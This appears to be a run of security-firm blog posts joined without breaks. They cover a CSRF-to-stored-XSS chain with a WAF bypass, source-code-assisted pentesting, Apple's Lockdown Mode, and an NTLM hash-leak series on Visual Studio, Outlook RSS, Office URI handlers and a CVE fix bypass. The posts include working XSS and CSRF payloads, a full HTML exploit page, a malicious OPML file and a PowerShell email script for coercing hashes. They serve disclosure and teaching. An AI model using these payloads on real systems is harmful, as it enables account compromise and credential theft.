tl;dr A recent client had a website which allows us to chain CSRF with a POST based self XSS issue to exploit XSS against any of their users while bypassing their WAF and various browser based protections. This allowed us to turn various minor issues into an immediate concern for the client who was able to resolve the issue quickly. Introduction On a recent job, we came across an environment where IP restrictions were used to restrict access to a website. While there was no authentication method for normal users, only people from a restricted set of IPs were able to access the site and the IP restrictions were well implemented without a bypass discovered during the engagement. Due to these controls, the threat model for the client was mostly focused on how someone could gain access to the website which was considered sensitive with a trusted user base. Doubling down on this, an intercepting Web Application Firewall (WAF) was implemented and the origin server locked down to avoid connections from untrusted IP addresses. So how do you attack a website when you can't access it? Well, if you can't bypass the IP restrictions, one way is to abuse the legitimate access provided to users of the site. But this has its own set of problems. For many years now browsers have been enforcing security boundaries between website in the form of the Same Origin Policy (SOP) and restrictions such as Cross Origin Resource Sharing (CORS) policies. These create a default untrusted state between unrelated websites which can be conditionally tunnelled through as required by developers. This post outlines how we overcame these and other restrictions to create a full attack chain such that when a victim visits a malicious website, a 0 click XSS payload is triggered to attack the target website if the victim is connecting from a trusted IP address. Self XSS - Always a critical issue During the penetration test, a couple of interesting behaviours were observed. Users could subscribe to email feeds using their email and name. They could then search for their email, returning what they had been subscribed to and update their preferences. HTML injection was found in the name field which would be returned when searching for an email but there were just a couple of problems:
Despite these problems some hope existed!
First, send a request to register your email: ... POST /update Content-Type: application/x-www-form-urlencoded [email protected]&name=info<h1>Test</h1> ... Then, to view the status of the email subscription, another request could be issued to return a JSON blob: ... POST /search Content-Type: application/x-www-form-urlencoded [email protected] ... Returning: ``` 200 Ok Content-Type: text/HTML Content-Security-Policy: default-src 'none'; script-src 'self' 'unsafe-eval' 'unsafe-inline'; {email:"[email protected]",name:"info<h1>Test</h1>"} ``` All works well, email subscribers can input their email to set their preferences and then enter it again to see what they have set and change their preferences. Bypassing the WAF With multiple restrictions on a payload, picking one to work on and bypass becomes important. Since the WAF appeared to be the difference between this being an info and potentially a critical or high finding, that was the first restriction we focused on. For this, only the first POST request, /update, needed to bypass the WAF to store the XSS in the application. Since this request used a stock standard POST request with the "application/x-www-form-urlencoded" content-type (or MIME type), the WAF knew exactly how to block it. Requests wouldn't be able to contain any dangerous html tags and trying to add in events to "safe" tags would get quickly shutdown. But those safe tags would be allowed through without sanitisation or escaping and then rendered by the application. Our awesome payload currently looks like a POST request to a pre-loaded HTML payload which renders "<h1>Test</h1>". Not quite ready to break out that champagne. While the WAF is really good with dealing with these standard requests, web applications don't just need to transmit text. The “form-urlencoded” content-type is known to be a bit limited. It follows a set format, and any URL encoded characters will get through the request but the application can’t easily and reliably know where a chunk of binary data ends after decoding the value. Because of this a complimentary content-type was implemented for HTTP forms, "multipart/form-data". This multipart request type was structured in a way which allowed for additional flexibility within well-defined boundaries. Essentially the request segments are broken up by random strings sent in the request header. Each block in the POST body can then have it’s own header and contain whatever data the application requires. When the server receives that request it can then process it knowing that all content between the random strings belongs to that segment of the request. Newlines no longer create chaos and now even the most complex files can be uploaded, length aside. Multipart requests sit alongside “form-urlencoded” from a time in the web before the common adoption of JSON and other data structures in HTTP requests and responses. This awards them a special place in the web stack with some privileges we'll cover later on, but, also means that our application that uses "form-urlencoded" likely also supports multipart requests out of the box. We can test that quickly using tools like Burp to change the body encoding which gives us something like the following: ``` POST /update Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVFaQphM6IfJtx4kh ------WebKitFormBoundaryVFaQphM6IfJtx4kh Content-Disposition: form-data; name="email" [email protected] ------WebKitFormBoundaryVFaQphM6IfJtx4kh Content-Disposition: form-data; name="name" info ------WebKitFormBoundaryVFaQphM6IfJtx4kh-- ``` Sending this to the application works, the email gets updated with the new name and preferences. While still a long way from a working PoC, this gives us a much larger attack surface to play with to bypass the WAF. The new restrictions on the WAF don't let us advance much, it's still quite aggressive on any potential XSS payloads but we're also missing a key flag which unlocks a whole new mode for the WAF rules. File uploads. Out of the box, WAFs need to support a broad range of web applications so they look for key signatures in the requests to determine appropriate structures and apply different rules. This default behaviour can be changed…. But requires tuning your WAF to your web application. Tuning of this nature is quite the process often being disruptive and time consuming so not often performed in a robust manner. As a result, file uploads are often left more permissive than the application explicitly needs them to be which is preferable behaviour compared to a customer of the WAF having a bad out-of-the-box experience. To indicate to both the WAF and application that our multipart request is a file upload, we need to add the "filename" flag to the request parts that we want to be treated as a file upload and have that ruleset used by the WAF. That looks like the following: ``` POST /update Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVFaQphM6IfJtx4kh ------WebKitFormBoundaryVFaQphM6IfJtx4kh Content-Disposition: form-data; name="email" [email protected] ------WebKitFormBoundaryVFaQphM6IfJtx4kh Content-Disposition: form-data; name="name" filename=”” info<img src='' onerror="alert(1)"> ------WebKitFormBoundaryVFaQphM6IfJtx4kh--` ``` And when we do this, we're met with success! We still have some requirements like not starting the payload with the "<" character but the WAF happily allows our XSS payload through thinking it's a legitimate upload of a HTML file (or something) and the application processes our payload! We get a 400 response code! Wait. That 400 response code doesn't look good and the application hasn't saved our new fancy payload. Remember how we assumed the multipart uploads would be supported? They really are and the server is also looking for that "filename" flag to apply some custom logic, in this case determining that the "name" field we're reliant on shouldn't be a file. So close and yet so far but at least now the WAF isn't universally blocking us. Parsing Logic Saves the Day So we now need a way for our "name" field with a "filename" flag to still bypass the WAF where it thinks we're uploading a file but also be invalidated on the server so that the server thinks the payload is text. On paper having these inverse states exist in the same request sounds impossible, surely both processes will look at the same request and have the same interpretation of it being a file upload or text. Thankfully, clashes in parsing logic for web technologies are pretty common and the same can be applied here. Cutting through the trial and error a payload was found which allowed this, specifically: .filename="" Where we're now looking at the following payload which bypasses the WAF and is accepted by the application: ``` POST /update Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVFaQphM6IfJtx4kh ------WebKitFormBoundaryVFaQphM6IfJtx4kh Content-Disposition: form-data; name="email" [email protected] ------WebKitFormBoundaryVFaQphM6IfJtx4kh Content-Disposition: form-data; name="name" .filename='' info<img src='' onerror="alert(1)"> ------WebKitFormBoundaryVFaQphM6IfJtx4kh-- ``` Trickery in the Types This payload works and is shown to us but it's not triggering. On inspection of the values we're being returned it's clear as to why. The content-type in the response might helpfully be "text/html" but we're not actually dealing with HTML, the application body is actually JSON and its escaping characters to meet that format, breaking our lovely payload in the process. So what characters can we use? Helpfully, pretty well everything except for '"', "'", "/" and "\". An easy win here would be to avoid all these issues and use the browser to accept a slightly malformed script tag linking off to a site we control where these restrictions don't apply, but the CSP blocks this. We've got to get a payload working despite this escaping. We're left with two main problems due to this. First, we can't close any HTML tags. If we open a tag, then we're reliant on either the browser closing it for us or the tag being able to be left open with the contents remaining valid. Second, we can't use quotes in indicate to the browser where any HTML attributes start and end nor use these to define string variables in any payload. To work around these limitations, we've got to rely on the browser fixing our payload to make it valid HTML and trigger when it is viewed. Thankfully there is a lot of broken HTML on the internet and the browsers really want people to have a good experience so this isn't too hard. Our main constraint is that we can't have any spaces in an HTML attribute, further limiting our final payload. Despite that, with the CSP allowing unsafe-eval we can do some basic Javascript trickery and construct any payload we like to be executed. To keep up tradition, let's go with this as the classic alert(1): ``` POST /update Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVFaQphM6IfJtx4kh ------WebKitFormBoundaryVFaQphM6IfJtx4kh Content-Disposition: form-data; name="email" [email protected] ------WebKitFormBoundaryVFaQphM6IfJtx4kh Content-Disposition: form-data; name="name" .filename='' info<img src='' onerror=a=[97,108,101,114,116,40,49,41];o=[];a.forEach(function(b){o+=String.fromCharCode(b);});eval(o); > ------WebKitFormBoundaryVFaQphM6IfJtx4kh-- ``` Here, the browser looks at the "onerror" attribute and sees that after the first "=" character there the rest should be the value of the attribute terminated by a space character. Then the browser wraps that content in quotes causing creating a valid event attribute which triggers as soon as the img tag is rendered seeing the invalid src attribute. The JavaScript payload then takes the integer values, which don't require any of the disallowed characters, turns them into a string and then evals the result giving us execution of arbitrary functions. There are no real length restrictions on the "name" field we're submitting so we've got a lot of room to play with despite the long payload. This abuses both weaknesses in the CSP - 'unsafe-eval' 'unsafe-inline'. While we ended up using quotes in the “src” attribute, resulting in them being escaped, the browser helpfully attempts to fix this again to give us a “src” valid enough for the onerror event to trigger. Making POST based XSS Viable Thanks to a bit of perseverance, we've now got a stored XSS payload which gets through the WAF and is triggered despite the character restrictions. But it's still self XSS requiring a POST based redirect to trigger, a notoriously useless method, and we haven't managed to meet the client's requirements of attacking the application in spite of the IP restrictions. Without these, all the hard work really doesn't mean much. Thankfully, as you may have noticed on the requests we're sending, there isn't any protection against Cross-Site Request Forgery. If we can embed this payload somewhere else on the internet and a victim user navigates to the site from an allowed IP address, then we should be able to abuse their implicit access to the site and run the payload against them. For a successful CSRF payload we need several key parts. This includes:
Preflight requests are a specific protection implemented in browsers to ensure that sites are meant to be communicating between them. The idea is pretty simple really, any random site on the internet shouldn't be any to arbitrarily send requests to other sites. But the implementation of this had to take into consideration existing sites on the internet which legitimately needed this behaviour and would be difficult to update, such as Single Sign-On (SSO) login flows. This necessitated the creation of distinct request groups where more "standard" requests could be sent without a preflight request and everything else would have a preflight request prior to any data being sent. If a preflight request is needed, then the target server needs to respond with appropriate headers which say that the originating site is indeed permitted to send the actual request. Since a preflight request uses the OPTIONS request method not all servers understand how to respond, let alone respond with the correct headers. Then, when the browser fails to see the required response, it stops the request process and the intended request never even makes it to the target server. This is the scenario we're trying to exploit meaning we need to avoid the browser sending a preflight request. So, what requirements do we need to meet for this? We must confirm to what's known as a "Simple request". This is defined as a request which meets all the following (from https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests):
Remember how we were saying earlier that the Content-Types relating to forms are an older specification and are awarded special privileges? This is one of those and thankfully, this lets us construct a payload to exploit this issue. However, we're not quite in the clear. In order to bypass the WAF rules we still need to send a slightly malformed request which uses the ".filename" field. This prevents us from just spinning up a form on our malicious website and sending the request, instead we need to use the Fetch API to construct a simple request which contains our very specific payload to load the XSS payload in the application. After that it's a simple case of posting a form asking to view the contents of our malicious email subscription, automatically redirecting to the page and causing the XSS to trigger. Here's the full payload: ``` html <html> <head> </head> <body> <form id="formy" method=POST action="https://127.0.0.1/search" hidden> <input type="text" value="[email protected]" name="email"> </form> <script> var response = fetch("https://127.0.0.1/update", { method: "POST", mode: "no-cors", credentials: "include", headers: { "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryDmHwBH6vm3UjIccu", }, body: `------WebKitFormBoundaryDmHwBH6vm3UjIccu Content-Disposition: form-data; name="email" [email protected] ------WebKitFormBoundaryDmHwBH6vm3UjIccu Content-Disposition: form-data; name="name"; .filename='' info<img src='' onerror=a=[97,108,101,114,116,40,49,41];o=[];a.forEach(function(b){o+=String.fromCharCode(b);});eval(o); > ------WebKitFormBoundaryDmHwBH6vm3UjIccu--`, }); document.getElementById("formy").submit(); </script> </body> </html> ``` Summary: This exploit abused several issues, including:
Author: Matt Dekker tl;dr
Traditional black box penetration tests are limited, and the complexities (and attack surface) of systems can be hidden. Using source code and design information to assist with testing can uncover hidden attack surfaces and provide tremendous value in an otherwise time-limited engagement. Providing source code to help with an engagement can result in great benefits for both parties. This post is intended to provide some insight into how source-code assisted pentesting can result in great outcomes for everyone. Introduction: 10-15 years ago, source code was a valuable commodity. A company could easily spend tens of millions of dollars on developers, and the value of the platform would predominantly be the IP (Intellectual Property) - the source code and the product itself. In 2025, while developers are still reasonably valuable , the barriers to developing or reproducing software have dropped significantly and the value in software products has shifted. A lot of source code is based on open-source libraries. In ye olde days, everything was custom - now it's generally asmaller custom layer, with a lot of open-source components. Using and analysing source code is an efficient way of not only testing the application itself, but finding paths between the application and the libraries in use. The benefits:
We have heard a lot of reasons as to why people can't/won't give us source code, including:
White box testing: This testing is performed with full source code and related design documents to assist with testing. This type of testing is extremely efficient at uncovering hidden attack surfaces and can lead to significantly better results. Black box testing: This testing is performed without an internal knowledge of what is being tested, and the testing focuses on the external behaviour of the software based on testing input. The reality is, we use our experience, some frameworks/methodologies, and various heuristics to throw things at an application and try and understand the inner workings of the application. Grey box testing: Somewhere in between black and white box, the testing involves similar behaviour checking to black box testing. However, the tests are more informed and can use source code or other normally hidden details about the inner workings of the application to develop test cases. We work pretty hard to execute code on your machines As a penetration tester, we work hard to execute code on your servers. We also work our way across a breadth of vulnerability checks and exploits to try and cover as much ground as possible in a very short timeframe. We're going to try to get your source code anyway, whether that be reverse engineering binaries that we found, downloading AMI images from AWS, finding git repos, or looking for git in web root (it happens). This is a team sport / we want the same outcome Cybersecurity is a team sport. We're not here to say, 'your code is bad, you should feel bad', or to use silly language comparing code bases to cybertrucks on fire. We don't know the context in which this code was written, we don't know your software lifecycle, we don't know what your marketing team promised to your biggest customer or the timeframe they promised it in. All we know is that you’ve come to us to help uplift your security posture, and providing source code allows us to do just that. In mid-2022, Apple announced the release of an additional security feature for iOS, iPadOS, and macOS called Lockdown Mode. This was described as an extreme, optional measure to help protect users who may be personally targeted by sophisticated mercenary spyware. It appears this feature was a response to the renowned Pegasus spyware developed by the Israeli cyber intelligence firm NSO Group Technologies, which was used to target activists, journalists, and politicians globally. Apple have provided limited technical details about Lockdown Mode, instead offering a list of eight features that will operate differently when the mode is enabled. In this post we take a look at the possible security reasoning behind the changes to the eight disclosed features which will be altered with Lockdown Mode.
MessagesApple states that ‘Most message attachment types are blocked, other than certain images, video, and audio. Some features, such as links and link previews, are unavailable. Messages with attachments or links can be used to get a user to execute malware on their device. Typically, the attachment contains an executable which is run when the user previews or clicks on the attachment. By restricting attachment types (different file types) and preventing links within messages, this reduces the attack vectors used to distribute malware onto an individual’s device. Thus, the potential malware cannot be distributed to the user’s device through messages. As some attachment types are still allowed, it is still possible, however this feature will limit the options for an attacker to distribute the malware as only a select number of file types could be used to do so. Web browsingIn the released post, Apple states that ‘Certain complex web technologies are blocked, which might cause some websites to load more slowly or not operate correctly. In addition, web fonts might not be displayed, and images might be replaced with a missing image icon’. They have also stated separately that just-in-time (JIT) JavaScript compilation is disabled. An in-depth review of the changes to web browsing was conducted separately by independent researchers Russell Graves and Alexis Lours. The changes to the browser which were discovered are:
FaceTimeIn regard to FaceTime, Apple stated that ‘Incoming FaceTime calls are blocked unless you have previously called that person or contact. Features such as SharePlay and Live Photos are unavailable. Blocking incoming FaceTime calls works to prevent an attacker from exploiting a potential zero-day vulnerability within the FaceTime service to compromise a user’s device. The attacker would not be able to interact with the FaceTime service without being a trusted contact. Furthermore, by blocking extra FaceTime features such as SharePlay and Live Photos, the attack surface is reduced by minimising the number of openings which could have potential vulnerabilities. As FaceTime calls are still allowed for contacts which the user has previously contacted, the FaceTime service could still be used to leverage an attack, however this would involve more steps to initially become a trusted contact. This feature follows the ‘deny by default’ approach, requiring a more sophisticated attack method. Apple servicesIt was stated that ‘Incoming invitations for Apple services, such as invitations to manage a home in the Home app, are blocked unless you have previously invited that person. Game Center is also disabled. As with the FaceTime feature, by blocking incoming invitations for Apple services and disabling Game Centre, the potential attack surface is reduced. Attackers are not able to directly exploit any potential zero days surrounding certain Apple services. Again, an attacker must become a trusted person to exploit any related vulnerabilities by first having received an invitation for the service from the device owner. By blocking incoming invitations for Apple services, it also prevents some phishing attacks utilising the Apple service invitation. For example, if a malicious individual sends an invitation for an Apple service posing as a known or trusted person, this would be blocked. PhotosApple states that ‘When you share photos, location information is excluded. Shared albums are removed from the Photos app, and new Shared Album invitations are blocked. You can still view these shared albums on other devices that don’t have Lockdown Mode enabled. This feature of Lockdown Mode appears to be primarily focused on protecting the users privacy, to prevent the accidental leak of photos and associated metadata. By removing location information when sharing photos and removing shared albums, a user is less likely to accidentally share photos and corresponding metadata such as location data. Withdrawing the shared albums and shared album invitation feature, will also reduce the attack surface by restricting the number of potential vulnerabilities which could be exploited but also prevent the risk of shared content. Device connectionsIt is stated that ‘To connect your iPhone or iPad to an accessory or another computer, the device needs to be unlocked. To connect your Mac laptop with Apple silicon to an accessory, your Mac needs to be unlocked and you need to provide explicit approval. An avenue to deploy malware onto a device is through physical accessories which contain malware that users will plug into their device. This can be as simple as a USB drive or more sophisticated methods such as modified charging cables. A well-known attack method is juice jacking, this is where a malicious actor will infect a USB port or cable attached to the port with malware. This is then stationed in public spaces such as airports or cafes where unsuspecting users will use the accessories to charge their devices, and consequently their device will be infected with malware, or their data is exfiltrated. Apples implementation of this feature prevents the exfiltration of data or distribution of malware onto the device through a physical accessory as the device needs to be unlocked and approval given. Even with this preventative measure, it is still possible an attacker could be successful if the user unsuspectingly trusts a malicious accessory. Wireless connectivityApple states that ‘Your device won't automatically join non-secure Wi-Fi networks and will disconnect from a non-secure Wi-Fi network when you turn on Lockdown Mode. 2G cellular support is turned off'. As it is not defined what a ‘non-secure Wi-Fi network’ is, it is difficult to gauge what this feature does specifically. It is likely the classification of a non-secure network is based on which wireless security protocol (commonly referred to as Wi-Fi security protocol) is used or if the network is open and doesn’t require authentication. Outdated wireless security protocols such as Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA) have known vulnerabilities which attackers can exploit. An open network can be leveraged by an attacker to conduct many different attacks. The likely intent of this feature is to prevent data from being intercepted within networks as well as prevent malware distribution. Many services and sites still use unencrypted protocols such as the Hypertext Transfer Protocol (HTTP) for web applications or File Transfer Protocol (FTP) for file transfer, allowing an attacker to read any intercepted data. Malware distribution through a non-secure network can be achieved as devices can be identified and communicated with on the network, or an attacker could then exploit a device vulnerability to spread malware onto the device. Configuration Profiles It is stated ‘Configuration profiles can’t be installed, and the device can’t be enrolled in Mobile Device Management or device supervision while in Lockdown Mode’. Configuration profiles, mobile device management, and device supervision are features which are typically used by an organisation that allow them to configure and manage devices. As these features allow a third party to control the device, if the third party’s access credentials are compromised this can be used by a malicious actor to exfiltrate data or install malware on the device. Removing the ability to install configuration files and enrolling the device in device management or supervision ensures that the governance of the device remains solely in the hands of the owner. Furthermore, this again will reduce the exposure points by reducing the number of features which may have vulnerabilities. Conclusion Overall, the features Apple have implemented for Lockdown Mode appear to reduce the attack surface of a user’s device and increase the privacy posture. Apple have taken the approach of reducing functionality instead of building more complex workarounds to enhance security. This may affect the users experience such as the decreased browser performance, however Apple has explicitly stated this is an extreme optional measure. Even with the disclosed features of Lockdown Mode in place, ultimately the user’s actions with their device can compromise it. Some of the feature’s implemented will help prevent user’s from making mistakes, such as blocking links and many attachment types within messages. A potential drawback from Lockdown Mode is digital fingerprinting. It can make a user identifiable purely from using Lockdown Mode, as there are likely not many individuals which use this feature. For example, through browser fingerprinting, a user would be identifiable due to all the web technologies which have been disabled. The majority of web users would not have disabled these technologies due to the performance and functionality decrease. To combat digital fingerprinting of Lockdown mode, the more people which use it, the harder it would be to distinguish individual devices. Lockdown Mode should not be seen as a guaranteed security of a device, if a user’s device is already compromised before the mode is enabled it will likely be ineffective and fundamentally even with all the security features, the users’ actions conducted on their device will have the largest effect on their privacy and security. Author: Julius Staufenberg tl;dr Microsoft Visual Studio contains a won’t-fix NTLM hash leak when repositories are cloned from untrusted sources, including GitHub. By hosting a malicious repository on a server that requires authentication, which may be included in other repositories as a Git submodule, it would be possible to coerce or obtain the hashes of anyone cloning the repository. Introduction This is part five of a five-part blog post series focusing on NTLM-related research that was presented as part of the DEF CON 32 presentation 'NTLM - the last ride'. After hearing the news that Microsoft is planning to kill off NTLM (New Technology Lan Manager) authentication in Windows 11 and above, we decided to speedrun coercing hashes out of a few more things before it fades into obscurity over the next twenty-five years or so. For more detail about what NTLM is, what you can do with them, and why being able to get them out of things is bad, please see our first blog post in this series. Visual Studio Visual Studio is Microsoft’s own Integrated Development Environment (IDE), mainly used by developers for creating .NET-based applications. It was first released in 1997 and has received steady updates to this day. After discovering a different issue in Visual Studio to do with the Nuget package manager, we decided to come back to it and have a second look for bugs. One thing that Visual Studio supports, like most modern IDEs, is the ability to clone a remote repository via Git. When the application launches without an active project configured, a dialog box is presented with the option to Git clone a repo. As we were looking for more NTLM hash leak vulnerabilities, we thought “how does it work when it needs credentials?” Git (but for Windows) Usually when people use Git, they either use a username and password to authenticate, or more likely an SSH key. But because Git (and Visual Studio) are often used in large organisations, it needs to support other forms of authentication like NTLM. How does Git know when to use NTLM to authenticate? Weirdly, it doesn’t use a command line flag or a config file. Instead, when a user attempts to Git clone from a NTLM-authenticated source the user just needs to specify an empty username and password. This then, of course, sends the NTLM hash to the awaiting server. Git Credential Manager But how does it work from a GUI? Surely a user doesn’t need to enter their credentials every time? This is where Git Credential Manager (GCM) comes in. Git Credential Manager was written by Microsoft (now maintained by GitHub, who are now owned by Microsoft) for this exact purpose: figuring out what connects to where, when. It stores usernames and passwords in the user’s .gitconfig file for connecting to different Git servers. You’d think that when connecting to an NTLM-authenticated source it would store a flag indicating that it should use NTLM when connecting to it, right? Well, as mentioned before, you use a blank username and password when connecting to the server and then Git will handle the rest. And so GCM will store a blank username and password in the .gitconfig file, and it will do it automatically on first contact (i.e. on Git clone). GCM in Visual Studio You may see where this becomes a bit of an issue. When you Git clone a repository from Visual Studio it will hand off to Git and GCM. GCM sees that the server hasn’t got any credentials configured for it and passes a blank username and password to Git. Git sees the blank username and password and uses the default Windows credentials. This then sends off a Net-NTLMv2 hash to the awaiting Git server. As Visual Studio also passes `--recursive` to Git as it clones, this works within submodules. An attacker could hide a malicious Git submodule inside of a repository, such as within a popular GitHub repository, and any user who clones that repository will leak their credentials to the attacker’s server. This behaviour also happens in Git-powered packages managers, such as VCPKG, which is unlikely unintended behaviour and similar to the Nuget package manager issue we found. Reproduction steps
These are the steps that take place in the video
Disclosure timeline
tl;dr By leveraging sharing headers within Outlook, as with the CVE bypass we discovered, it was possible to create a Net-NTLMv2 hash leak in Outlook with one click, no warnings. Introduction This is part four of a five-part blog post series focusing on NTLM-related research that was presented as part of the DEF CON 32 presentation 'NTLM - the last ride'. After hearing the news that Microsoft is planning to kill off NTLM (New Technology Lan Manager) authentication in Windows 11 and above, we decided to speedrun coercing hashes out of a few more things before it fades into obscurity over the next twenty-five years or so. For more detail about what NTLM is, what you can do with them, and why being able to get them out of things is bad, please see our first blog post in this series (link) What is RSS? If you remember the internet in the mid to late 2000s, you probably remember RSS. If you don’t, RSS (which stands for RDF Site Summary or Really Simple Syndication, depending on who you ask) is a thing on websites that allows users and applications to access updates to websites in a computer-readable format (XML). News sites and blogs publish the RSS feeds, and then RSS reader programs would periodically fetch the feeds and display them to the user. RSS in Outlook In 2007, around about the same time as RSS was popular, Microsoft added RSS reader functionality to Outlook. Because Microsoft never removes functionality, Outlook still has this capability today. RSS feeds can be added in three ways:
The vulnerabilities We first poked around with RSS by messing with the OPML file format. OPML, or Outline Processor Markup Language, is yet another XML file format. It can be used to create a list of RSS feeds to subscribe to, which can be useful in cases such as exporting feeds from one reader when switching to another. We tried creating a .opml file with the following contents: <?xml version="1.0" encoding="UTF-8"?> <opml version="1.0"> <head> <title>Sample OPML File</title> </head> <body> <outline text="My RSS Feeds"> <outline text="Tech News" type="rss" xmlUrl="\\\\192.168.178.74\\" /> <!-- Add more RSS feed outlines as needed --> </outline> </body> </opml> Double-clicking this file opened Outlook and... it didn’t work. But back in part two (link) we learned about redirecting HTTP traffic to SMB. We changed the `xmlUrl` value to point to a HTTP redirector and this time it worked! Outlook successfully followed the redirect and leaked a Net-NTLMv2 hash. This issue was then disclosed to the MSRC team. While waiting for a response, we investigated if there were any other ways of getting Outlook to leak a hash via RSS. In the previous post we learned about the URI handlers that Outlook supports, which includes the `feed:` URI. By combining it with the `x-sharing-config-url:` email header from part 2 we can generate an email that prompts users to add an RSS feed to Outlook. As soon as they click the “Add this RSS Feed” button, their Net-NTLMv2 hash is leaked. Fun sidenote: you can include images in CDATA tags once the feed has been imported.
Reproduction steps We provided the following PowerShell script to MS to assist with reproduction: # Create an instance of the Outlook Application $outlook = New-Object -ComObject Outlook.Application # Create a new mail item $mail = $outlook.CreateItem(0) # Set the subject of the email $mail.Subject = "Sharing Email with Custom Headers" # Set the recipients (you can add multiple recipients separated by semicolons) $mail.Recipients.Add("[email protected]") # Set the body of the email $mail.Body = "This is the body of the email." # Add custom headers $mail.PropertyAccessor.SetProperty("http://schemas.microsoft.com/mapi/string/{00020386-0000-0000-C000-000000000046}/x-sharing-config-url", "feed://privsec.nz/test.xml") $mail.PropertyAccessor.SetProperty("http://schemas.microsoft.com/mapi/string/{00020386-0000-0000-C000-000000000046}/Content-Class", "Sharing") # Send the email $mail.Send() # Display a confirmation message Write-Host "Email sent successfully." Disclosure timeline 08 May 2024: Reported to the MSRC 11 May 2024: Case opened by the MSRC 30 May 2024: Accepted as a vulnerability by MSRC but ‘Moderate’ so case closed August 2024: Disclosed at DEFCON32 tl;dr By leveraging Microsoft Office URI (Uniform Resource Identifier) handlers, it was possible to obtain a Net-NTLM-v2 (New Technology LAN Manager) hash from a victim after they clicked a single link in an email. This was patched by Microsoft in the August 2024 Patch Tuesday and CVE-2024-38200 was issued. Introduction This is part three of a five-part blog post series focusing on NTLM-related research that was presented as part of the DEF CON 32 presentation 'NTLM - the last ride'. After hearing the news that Microsoft is planning to kill off NTLM (New Technology Lan Manager) authentication in Windows 11 and above, we decided to speedrun coercing hashes out of a few more things before it fades into obscurity over the next twenty-five years or so. For more detail about what NTLM is, what you can do with them, and why being able to get them out of things is bad, please see our first blog post in this series. URI Handlers URI (Uniform Resource Identifier) schemes are small strings that identify a source of data or something for a program to load. Well known URIs include schemes such as `file://`, `http://`, `https://`, which when clicked, load the program associated with the URI scheme. In the case of `http` or `https`, the operating system will know to load the browser and fetch the content at the provided URL, and in the case of the `file://` URI scheme, the file explorer or similar may be loaded. The following Powershell (Administrator) one liner can be used to list all the installed handlers on Windows: Get-ChildItem -Path Registry::HKEY_CLASSES_ROOT | where Property -CContains "URL Protocol" | % { $_.ToString().Split('\')[1] } When Microsoft Office is installed on a Windows computer, several registry entries are made that associate the Office URI schemes to an associated program:
In this case `ofv` stands for Open for Viewing, and the `u` specifies the URL of the resource to fetch. Clicking a hyperlink or anchor tag with this URI handler from within a browser will prompt the following dialog box: Microsoft security controls As with previous testing, we found that Microsoft would frequently provide a warning dialog, if you were about to do something fun and/or dangerous. In the case of the URI handlers, within a browser, there would be a prompt asking if you would like to open the selected Office program. This is expected behaviour, as the security boundary shifts from the browser to the program that is associated with the URI scheme. In the case of Microsoft Office products, this means that macros will not be loaded, and neither will external resources. These are security protections designed to prevent malicious exploits from happening within these programs. However, after enumerating and testing various URI handler interactions within Outlook, it was found that by emailing a hyperlink with an office URI handler, there would be no dialog prompt. The URI handler would immediately open whichever Office program was specified and attempt to fetch the resource at the specified URL. As with previous HTTP interactions, no Net-NTLMv2 authentication would take place. By applying a 302 redirect (as with the CVE-2023-35636 bypass) it was possible to redirect from port 80 (HTTP) to port 445 (SMB) and capture the Net-NTLMv2 hash. Again, a small Python script (as in the previous blog) was used to perform the redirection. These network interactions would happen before any document was loaded, bypassing the intended security controls in both the browser and the Office program. The below video shows the flow: These are the steps that take place in the video:
tl;dr In 2023, Varonis Labs discovered (https://www.varonis.com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes) that a Net-NTLMv2 hash could be received from a victim by tricking them into opening a calendar in Outlook. CVE-2023-35636 was issued and was subsequently fixed in December 2023. By leveraging a technique commonly used in SSRF (Server-Side Request Forgery), and redirecting a HTTP request to a UNC path, we were able to bypass Microsoft’s fix and obtain a Net-NTLM-v2 hash. Microsoft patched this as part of the July 2024 Patch Tuesday and issued CVE-2024-38020 (https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-38020). Introduction This is part two of a five-part blog post series focusing on NTLM-related research that was presented as part of the DEF CON 32 presentation 'NTLM - the last ride'. After hearing the news that Microsoft is planning to kill off NTLM (New Technology Lan Manager) authentication in Windows 11 and above, we decided to speedrun coercing hashes out of a few more things before it fades into obscurity over the next twenty-five years or so. For more detail about what NTLM is, please see our first blog post in this series (https://www.privsec.nz/releases/nuget-package-manager) Outlook Outlook is Microsoft’s email client, widely used throughout the world. It comes in multiple flavours and variants, from the Windows desktop client (classic), the browser client, to the (new) desktop client which is built using WebView 2. Outlook allows for sharing and receiving emails, calendars, invitations and other event and message types between different users of different organisations. Microsoft security controls The security controls Microsoft implement for externally provided content often take the form of a warning dialog box, letting the user know that if they choose to interact with external content that is not trusted they may be about to do something dangerous or fun. The vulnerability The original CVE (CVE-2023-35636) leveraged two headers that can be included in an email, which can be specified by the sender. Email headers are hidden parts of an email that can contain information about the sender, and how the message is routed and authenticated. The following Outlook-specific headers were used: Content-Class: x-sharing-config-url: When the value of `Content-Class` was set to “sharing”, this instructs Outlook that the received message is for sharing content. When the `x-sharing-config-url` was set to a file URL or UNC path containing an ICS (calendar) file, Outlook would helpfully format the top of the email with a call to action for the user to add the calendar to their own: This vulnerability was a one-click, no warning Net-NTLMv2 hash leaker, and was classed as Important and fixed in January 2024. The initial fix Microsoft added a dialog warning to any `x-sharing-config-url` that started with the `file:\\\` handler, letting the user know that by clicking the dialog they may be exposing themselves to risk: Bypassing the fix We noticed that Outlook was only popping up a dialog box on a UNC/File path link, and that HTTP connections were not providing the same warnings. This was a reasonable assumption for the fix, as Windows generally doesn’t send authentication on port 80/443 unless it is to a trusted location, such as an internal network. However, by reframing this problem to be more like a SSRF (Server-Side Request Forgery), we were able to apply a redirection technique, and subsequently capture a Net-NTLMv2 hash on port 445. Using a basic Python script, we would redirect any incoming web (HTTP) requests to a UNC path: This is a common technique in SSRF to bypass filter protections, or turn a web-only SSRF into a file read exploit, by forcing a protocol change from http:// to file:// The new flow can be roughly summarised below:
Reproduction steps To reproduce this issue, we have created the following PowerShell script that you are able to run on a Windows machine with Outlook installed: This issue was patched as part of July 2024 Patch Tuesday, and CVE-2024-38020 was assigned.
